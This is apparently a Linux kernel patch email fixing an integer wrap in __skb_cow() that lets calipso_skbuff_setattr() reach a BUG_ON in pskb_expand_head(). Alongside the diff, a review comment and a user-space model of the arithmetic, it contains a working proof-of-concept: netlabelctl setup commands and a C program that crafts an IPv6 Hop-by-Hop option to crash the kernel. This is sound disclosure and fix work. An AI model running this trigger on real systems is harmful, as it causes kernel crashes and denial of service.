From: Will Rosenberg
To:
Cc: security@kernel.org, Will Rosenberg, Paul Moore, "David S. Miller", David Ahern, Eric Dumazet, Jakub Kicinski, Paolo Abeni, Simon Horman, Huw Davies, netdev@vger.kernel.org, linux-security-module@vger.kernel.org, linux-kernel@vger.kernel.org
Subject: [PATCH] ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()
Date: Fri, 19 Dec 2025 10:36:37 -0700
Message-Id: <20251219173637.797418-1-whrosenb@asu.edu>

There exists a kernel oops caused by a BUG_ON(nhead < 0) at
net/core/skbuff.c:2232 in pskb_expand_head(). This bug is triggered as
part of the calipso_skbuff_setattr() routine when skb_cow() is passed
headroom > INT_MAX (i.e. (int)(skb_headroom(skb) + len_delta) < 0).

The root cause of the bug is due to an implicit integer cast in
__skb_cow(). The check (headroom > skb_headroom(skb)) is meant to ensure
that delta = headroom - skb_headroom(skb) is never negative, otherwise we
will trigger a BUG_ON in pskb_expand_head(). However, if
headroom > INT_MAX and delta <= -NET_SKB_PAD, the check passes, delta
becomes negative, and pskb_expand_head() is passed a negative value for
nhead.

Fix the trigger condition in calipso_skbuff_setattr(). Avoid passing
"negative" headroom sizes to skb_cow() within calipso_skbuff_setattr()
by only using skb_cow() to grow headroom.
PoC:

Using the `netlabelctl` tool:

netlabelctl map del default
netlabelctl calipso add pass doi:7
netlabelctl map add default address:0::1/128 protocol:calipso,7

Then run the following PoC:

#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>

int main(void)
{
    int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);
    if (fd < 0) {
        perror("socket");
        return 1;
    }

    // setup msghdr
    int cmsg_len = 0x60;
    struct msghdr msg;
    struct sockaddr_in6 dest_addr;
    struct cmsghdr *cmsg = (struct cmsghdr *) calloc(1, sizeof(struct cmsghdr) + cmsg_len);
    msg.msg_name = &dest_addr;
    msg.msg_namelen = sizeof(dest_addr);
    msg.msg_iov = NULL;
    msg.msg_iovlen = 0;
    msg.msg_control = cmsg;
    msg.msg_controllen = cmsg_len;
    msg.msg_flags = 0;

    // setup sockaddr: UDP to ::1, which the netlabel map above labels with CALIPSO DOI 7
    dest_addr.sin6_family = AF_INET6;
    dest_addr.sin6_port = htons(31337);
    dest_addr.sin6_flowinfo = htonl(31337);
    dest_addr.sin6_addr = in6addr_loopback;
    dest_addr.sin6_scope_id = 31337;

    // setup cmsghdr: a user-supplied IPv6 Hop-by-Hop options header
    cmsg->cmsg_len = cmsg_len;
    cmsg->cmsg_level = IPPROTO_IPV6;
    cmsg->cmsg_type = IPV6_HOPOPTS;
    char *hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);
    hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80

    if (sendmsg(fd, &msg, 0) < 0)
        perror("sendmsg");
    return 0;
}

Fixes: 2917f57b6bc1 ("calipso: Allow the lsm to label the skbuff directly.")
Signed-off-by: Will Rosenberg
Acked-by: Paul Moore
---
Notes:
- Changing __skb_cow() would likely require an audit of all its use cases
  due to its long legacy in the kernel. After private discussions, it was
  decided that this patch should be applied to calipso to remedy the
  immediate symptoms and allow for easy backporting. However, net devs
  should consider remedying the root cause through __skb_cow() and
  skb_cow().

- Paul, please let me know if I should add any form of credit for the
  patch code, such as "Suggested-by".

 net/ipv6/calipso.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/net/ipv6/calipso.c b/net/ipv6/calipso.c
index df1986973430..21f6ed126253 100644
--- a/net/ipv6/calipso.c
+++ b/net/ipv6/calipso.c
@@ -1342,7 +1342,8 @@ static int calipso_skbuff_setattr(struct sk_buff *skb, /* At this point new_end aligns to 4n, so (new_end & 4) pads to 8n */ pad =3D ((new_end & 4) + (end & 7)) & 7; len_delta =3D new_end - (int)end + pad; - ret_val =3D skb_cow(skb, skb_headroom(skb) + len_delta); + ret_val =3D skb_cow(skb, + skb_headroom(skb) + (len_delta > 0 ? len_delta : 0)); if (ret_val < 0) return ret_val; =20 base-commit: ea1013c1539270e372fc99854bc6e4d94eaeff66 --=20 2.34.1
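Review bot: the clamp on the two `+` lines is correct but carries no comment, and `skb_headroom(skb) + len_delta` is exactly what a later cleanup would "simplify" it back to; add a one-line comment above the `skb_cow()` call saying that the call must only ever grow headroom because a negative `len_delta` added to the `unsigned int` returned by `skb_headroom()` wraps past INT_MAX and passes the `(headroom > skb_headroom(skb))` check in `__skb_cow()`, as the commit message explains. For readability, `skb_headroom(skb) + max(len_delta, 0)` (both operands are `int`) states the intent more directly than the ternary and fits on the original single line.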
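The wrap the commit message describes, as an added example that is not part of the patch or of the kernel: a user-space model in C of the headroom arithmetic in __skb_cow() and of the BUG_ON(nhead < 0) in pskb_expand_head(), with the pre-patch and post-patch calipso_skbuff_setattr() expressions side by side. The skb itself is dropped; only the integer arithmetic the commit message quotes is kept, and the function names (calipso_headroom_before, calipso_headroom_after, model_skb_cow, cow_would_bug) are hypothetical. NET_SKB_PAD = 64 (the x86-64 value of max(32, L1_CACHE_BYTES)) and a 128-byte headroom are assumptions, and the len_delta values are constructed to hit each case: a positive delta, a small negative delta that wraps but is rounded back to 0 by ALIGN(), and a delta at or below -NET_SKB_PAD that reaches the BUG_ON().

```c
/*
 * User-space model of the integer wrap the patch works around.  Added
 * example, not kernel code: struct sk_buff, __skb_cow() and
 * pskb_expand_head() are replaced by the arithmetic they perform on
 * headroom sizes, taken from the commit message above.
 */
#include <limits.h>
#include <stdbool.h>
#include <stdio.h>

/* Assumed: NET_SKB_PAD is max(32, L1_CACHE_BYTES), which is 64 on x86-64. */
#define NET_SKB_PAD 64

/* Kernel ALIGN() applied to an int: the mask takes the type of x, so it
 * stays signed and rounds a negative delta in (-NET_SKB_PAD, 0) up to 0. */
#define ALIGN_INT(x, a) (((x) + ((a) - 1)) & ~((a) - 1))

struct cow_trace {
	unsigned int headroom;  /* value handed to skb_cow()                         */
	bool check_passed;      /* (headroom > skb_headroom(skb)) in __skb_cow()     */
	int delta;              /* int delta = headroom - skb_headroom(skb)          */
	int nhead;              /* ALIGN(delta, NET_SKB_PAD): pskb_expand_head() arg */
	bool would_bug;         /* BUG_ON(nhead < 0) fires                           */
};

/* What calipso_skbuff_setattr() passed to skb_cow() before the patch:
 * unsigned int + negative int wraps to a value above INT_MAX. */
static unsigned int calipso_headroom_before(unsigned int skb_headroom, int len_delta)
{
	return skb_headroom + len_delta;
}

/* After the patch: skb_cow() is only ever asked to grow headroom. */
static unsigned int calipso_headroom_after(unsigned int skb_headroom, int len_delta)
{
	return skb_headroom + (len_delta > 0 ? len_delta : 0);
}

/* Mirror of the headroom arithmetic in __skb_cow() and the BUG_ON in
 * pskb_expand_head(); no memory is touched. */
static struct cow_trace model_skb_cow(unsigned int skb_headroom, unsigned int headroom)
{
	struct cow_trace t = { .headroom = headroom };
	int delta = 0;

	if (headroom > skb_headroom) {
		t.check_passed = true;
		delta = headroom - skb_headroom;  /* implicit unsigned -> int conversion */
	}
	t.delta = delta;
	t.nhead = ALIGN_INT(delta, NET_SKB_PAD);
	t.would_bug = t.nhead < 0;
	return t;
}

/* Does a given (skb_headroom, len_delta) pair reach the BUG_ON, with or
 * without the patch applied? */
static bool cow_would_bug(unsigned int skb_headroom, int len_delta, bool patched)
{
	unsigned int headroom = patched ? calipso_headroom_after(skb_headroom, len_delta)
					: calipso_headroom_before(skb_headroom, len_delta);
	return model_skb_cow(skb_headroom, headroom).would_bug;
}

static void dump(const char *label, unsigned int skb_headroom, int len_delta, bool patched)
{
	unsigned int headroom = patched ? calipso_headroom_after(skb_headroom, len_delta)
					: calipso_headroom_before(skb_headroom, len_delta);
	struct cow_trace t = model_skb_cow(skb_headroom, headroom);

	printf("%-22s headroom=%u (%s INT_MAX) check=%d delta=%d nhead=%d -> %s\n",
	       label, t.headroom, t.headroom > INT_MAX ? ">" : "<=",
	       t.check_passed, t.delta, t.nhead, t.would_bug ? "BUG_ON" : "ok");
}

int main(void)
{
	/* Constructed inputs: 128 bytes of headroom stands in for a real skb;
	 * the len_delta values are chosen to hit each branch of the analysis. */
	dump("grow by 100",          128,  100, false);
	dump("shrink by 10, old",    128,  -10, false); /* wraps, but ALIGN() rounds to 0 */
	dump("shrink by 200, old",   128, -200, false); /* wraps, nhead = -192: oops */
	dump("shrink by 200, fixed", 128, -200, true);
	return 0;
}
```

Compile with `cc -Wall model.c` and run. The third line shows the pre-patch path: the check passes because the wrapped headroom is above INT_MAX, delta comes out as -200, and ALIGN() leaves nhead at -192, which is the value the BUG_ON() in pskb_expand_head() rejects. The second line confirms the commit message's qualifier that only delta <= -NET_SKB_PAD crashes: -10 also slips past the check but ALIGN() rounds it back to 0. The fourth line shows the clamped call never entering the delta branch at all.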